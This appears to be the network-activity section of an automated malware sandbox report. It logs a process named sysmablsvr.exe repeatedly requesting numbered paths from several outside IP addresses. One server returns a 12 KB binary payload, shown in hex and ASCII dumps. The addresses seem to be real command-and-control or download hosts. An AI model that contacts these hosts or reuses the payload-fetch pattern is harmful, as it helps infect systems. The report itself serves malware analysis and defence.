                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            42192.168.2.449802185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:55.113538027 CEST166OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:55.821461916 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:55 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            43192.168.2.449803185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:58.061697006 CEST166OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:58.781685114 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:58 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            44192.168.2.44980577.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:01.827614069 CEST163OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            45192.168.2.44980777.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:05.511257887 CEST163OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            46192.168.2.44980977.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:09.245800018 CEST163OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            47192.168.2.44981077.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:12.986103058 CEST163OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            48192.168.2.44981277.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:16.809278011 CEST163OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            49192.168.2.44981477.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:20.527097940 CEST163OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            50192.168.2.44981691.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:25.451838017 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:26.509773016 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:26 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O
                                            Sep 17, 2024 23:12:26.509943962 CEST1236INData Raw: 21 22 e3 3a f8 64 ed d3 d6 31 f1 21 9f b6 49 60 d1 75 52 5e ed 96 2c 17 37 72 75 59 0c 38 aa 2c 14 89 b2 94 d9 b1 c4 bd cb 69 56 13 c2 e6 c2 4e 94 42 4c ab a8 13 37 df f1 30 27 8c df 4b 21 83 34 e8 67 0f 49 3f 73 b3 69 87 e4 53 75 2d 56 b7 3f e5
                                            Data Ascii: !":d1!I`uR^,7ruY8,iVNBL70'K!4gI?siSu-V?e2^(+#;,x{NsU{/>=NOcqHh6mzy~U;)/K</|{.f'O,,<=UjE-mJ,),FTuj0}YGHAWZm`%
                                            Sep 17, 2024 23:12:26.509984970 CEST1236INData Raw: 8c 7b d2 94 10 81 50 02 1b f8 df 9c 7f 20 a6 79 88 80 16 5a 89 90 19 d2 e1 21 c1 03 6c bf ad d8 ca 8d 65 26 17 dd 85 b6 e9 74 10 0a 32 72 30 5e 5e 67 6f d9 b8 a2 0f ab d9 01 62 52 0b 22 28 1c dd ba 4f 78 04 0a 46 20 b2 6c 00 d2 ad 9b 5c 62 8b 2f
                                            Data Ascii: {P yZ!le&t2r0^^gobR"(OxF l\b/{X$5vNXE!`FLNcS^)lQ l-Ts}R;$9DT?b(UGnw,";f+Q6vJ?U<6AQtn\&*8~/bUuq8
                                            Sep 17, 2024 23:12:26.510019064 CEST1236INData Raw: ec 6d 0b 68 66 0c c2 5d 9d 2a ae 94 6f df 44 73 f6 1d c9 bb 43 46 5c a8 84 41 08 ae 20 cd 6a b7 f1 a1 ad f4 8f cd 30 2e 38 77 b2 97 65 2d a5 44 ec b4 3b 2b 85 ef 49 41 9f 20 4c e0 76 6d d2 4d 78 9f b7 09 ee 55 58 52 90 1c 29 02 5a a8 4d 8b bc 8a
                                            Data Ascii: mhf]*oDsCF\A j0.8we-D;+IA LvmMxUXR)ZMDBY[A1dG5!j|Gb&v2]G\BspIQqTi3&ys?ok`Y{5*Va'NX^~s/.^[o3(]G9F]cPIT\+2n^a(`
                                            Sep 17, 2024 23:12:26.510072947 CEST896INData Raw: 10 0d 0b b9 5f 9d 6d e6 92 57 24 32 d1 17 e9 b2 d9 ae 0d 71 a1 d0 f5 93 db 74 24 44 1d 9c e2 88 95 42 43 e3 6d 72 fc 78 0b 0c 45 d3 b3 36 15 f1 98 ab 5f 59 68 bb c4 59 ff aa da 7d a2 ad c0 0d 7b 82 2d 3b 08 0f 12 be 08 9a 06 81 47 b2 42 9b 80 69
                                            Data Ascii: _mW$2qt$DBCmrxE6_YhY}{-;GBiuMPyVE=hEN+kq?<'e>4bcb7Ki<=b"x5V$)VO$&<B0^MgOFzgQTfHO_T1*6vX
                                            Sep 17, 2024 23:12:26.510107994 CEST1236INData Raw: d9 e9 43 0b 6b 48 2c 6f eb 85 0c 3c 7c 4d c9 ae c0 bc 52 73 ec bd c7 a9 39 91 10 43 92 1c ff 68 83 1e 33 f9 15 c6 e6 fc 6b 00 df ee 1e e9 3f ce 2f 64 71 ef 38 57 62 37 0d 28 27 95 4d c5 17 70 3a b2 14 79 54 45 7c 1d b9 88 c4 37 15 85 19 1a e1 79
                                            Data Ascii: CkH,o<|MRs9Ch3k?/dq8Wb7('Mp:yTE|7y/CX!{<n)0M!({>3g:fM&[Jb L`2#n9jF j$V;8^6\\I*R@%<jE|A'1}
                                            Sep 17, 2024 23:12:26.510144949 CEST1236INData Raw: b2 e0 da ae 5f d8 8b 30 6a 04 5a e6 7b 42 3a 19 84 61 29 58 b0 e4 96 41 a5 63 dd ae bc 69 d2 7a 5d e8 90 8b 6b 8f 54 b8 bf 31 99 5e 9c 9f e2 c3 9c e3 4c 5f 2d a4 7a 26 ec 02 eb ee 8a bc 06 37 2f ed e4 e0 e5 fb 19 71 d5 ed 0a 22 e8 85 ae 95 50 0b
                                            Data Ascii: _0jZ{B:a)XAciz]kT1^L_-z&7/q"P&~!/F8\Y a!#lZW~soCp+Du+?l6Z=rG(r"\q-@t=PB?W^;f
                                            Sep 17, 2024 23:12:26.510179996 CEST1236INData Raw: aa dc f3 5d ab aa a6 de f6 98 7e 94 fd 50 fd 2f bd 67 a5 f8 d3 c6 ab c2 06 8c 90 1b 0e f6 b6 fd 58 c4 94 08 68 4f fb f2 01 01 77 a7 61 ec 03 d3 94 27 71 a7 2c 19 9f 90 bd 61 0e 94 dc 98 64 ca 97 40 76 84 64 fa 9e 9e 1f 8a 96 0c 1b b5 ab 23 bf e3
                                            Data Ascii: ]~P/gXhOwa'q,ad@vd#2>icU>Bs^,4\g0cW\,_PckCH}?]0*6eS7$@YruOa:)3AgoH\/#TEW@=N*?kL
                                            Sep 17, 2024 23:12:26.510905027 CEST672INData Raw: 76 48 63 b3 7c c8 2a 7e f3 2c e0 ce 29 83 d6 44 43 e6 0d 13 72 19 c7 e7 78 e3 7a 27 17 d1 8e e4 88 3e b4 10 9f fc dc c3 11 17 6c 67 a7 75 2c 0d f9 c4 ab ce 9f 19 30 38 6b 07 8c 59 ba 6f 17 8b 1a 9c 2f 3b e6 04 a5 03 4a 5b af c8 1f d8 81 d5 8c 8c
                                            Data Ascii: vHc|*~,)DCrxz'>lgu,08kYo/;J[\L,m;IoY_p_1pFH'w|gSFr+"f 1]U$g@%ATN:Nw=pf5uttn[C-Sq-+83
                                            Sep 17, 2024 23:12:26.510940075 CEST1236INData Raw: 2f 8d ea 9b 50 32 2d 86 33 3e 9c e3 c2 0e c9 60 f4 12 61 6e 66 43 0b 20 e5 77 67 f6 fe 31 ca 07 54 91 44 0c 19 13 82 41 e6 18 8d cd 6a 95 11 e8 9c 03 fc dc c0 e9 f0 48 8a d6 71 8d d1 44 d1 ab ca c5 e3 88 df ad cc 93 5f 3f f9 58 8f ba 5b 24 8f 2c
                                            Data Ascii: /P2-3>`anfC wg1TDAjHqD_?X[$,:RH|P@dTF+hi28IM?fm"IP}Xz*ZSLv~_ DbXVtT0e|Ee!A@z[ler~M0}Mm;
                                            Sep 17, 2024 23:12:26.511456013 CEST1236INData Raw: 01 07 93 71 31 92 22 30 04 70 a5 e8 90 f9 74 f2 19 da 91 06 bc a5 a8 f8 f6 66 39 5b 25 6e e7 65 15 a1 3c c7 78 23 e4 2e 44 b3 cf 7b 95 b6 2e 22 16 41 ce 7a 83 49 30 9d 7a b4 0a f5 40 e4 2e be 71 90 e3 2d 05 a6 23 d4 fb 62 0e 78 ac 70 8f 7b 71 7f
                                            Data Ascii: q1"0ptf9[%ne<x#.D{."AzI0z@.q-#bxp{q?>i^+-l@BduZPtgh*a"-\Lhxf@kSqlZ3W@Tmn$?clY+O<hJDThe/{Euv0M^aX*xH/
                                            Sep 17, 2024 23:12:26.511990070 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:26 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            51192.168.2.44981791.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:28.071275949 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:28.823597908 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:28 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O
                                            Sep 17, 2024 23:12:28.823653936 CEST1236INData Raw: 21 22 e3 3a f8 64 ed d3 d6 31 f1 21 9f b6 49 60 d1 75 52 5e ed 96 2c 17 37 72 75 59 0c 38 aa 2c 14 89 b2 94 d9 b1 c4 bd cb 69 56 13 c2 e6 c2 4e 94 42 4c ab a8 13 37 df f1 30 27 8c df 4b 21 83 34 e8 67 0f 49 3f 73 b3 69 87 e4 53 75 2d 56 b7 3f e5
                                            Data Ascii: !":d1!I`uR^,7ruY8,iVNBL70'K!4gI?siSu-V?e2^(+#;,x{NsU{/>=NOcqHh6mzy~U;)/K</|{.f'O,,<=UjE-mJ,),FTuj0}YGHAWZm`%
                                            Sep 17, 2024 23:12:28.823692083 CEST1236INData Raw: 8c 7b d2 94 10 81 50 02 1b f8 df 9c 7f 20 a6 79 88 80 16 5a 89 90 19 d2 e1 21 c1 03 6c bf ad d8 ca 8d 65 26 17 dd 85 b6 e9 74 10 0a 32 72 30 5e 5e 67 6f d9 b8 a2 0f ab d9 01 62 52 0b 22 28 1c dd ba 4f 78 04 0a 46 20 b2 6c 00 d2 ad 9b 5c 62 8b 2f
                                            Data Ascii: {P yZ!le&t2r0^^gobR"(OxF l\b/{X$5vNXE!`FLNcS^)lQ l-Ts}R;$9DT?b(UGnw,";f+Q6vJ?U<6AQtn\&*8~/bUuq8
                                            Sep 17, 2024 23:12:28.823726892 CEST672INData Raw: ec 6d 0b 68 66 0c c2 5d 9d 2a ae 94 6f df 44 73 f6 1d c9 bb 43 46 5c a8 84 41 08 ae 20 cd 6a b7 f1 a1 ad f4 8f cd 30 2e 38 77 b2 97 65 2d a5 44 ec b4 3b 2b 85 ef 49 41 9f 20 4c e0 76 6d d2 4d 78 9f b7 09 ee 55 58 52 90 1c 29 02 5a a8 4d 8b bc 8a
                                            Data Ascii: mhf]*oDsCF\A j0.8we-D;+IA LvmMxUXR)ZMDBY[A1dG5!j|Gb&v2]G\BspIQqTi3&ys?ok`Y{5*Va'NX^~s/.^[o3(]G9F]cPIT\+2n^a(`
                                            Sep 17, 2024 23:12:28.823759079 CEST1236INData Raw: ef d7 38 96 62 65 ff 37 1b e5 80 7b a6 92 b3 d8 6b 1a a4 1c 46 8b c4 3d 83 e8 d7 46 7d 63 c0 59 f7 a4 b8 0a ea 73 1f f4 b2 1d 01 bf 7c 2b 9a 99 86 fb 17 ec cd 24 c2 b6 6c de a0 1a 56 6d 11 d2 65 d2 af b5 8b 0b 67 68 0a 8b 56 a3 24 d2 9b bc a6 b2
                                            Data Ascii: 8be7{kF=F}cYs|+$lVmeghV$f~2:|U.9f4U^x'+mPC0:SKK(XWDK(fnJKAwC?T*x'v]GQ/h=*u3%8PjaZ3aZ
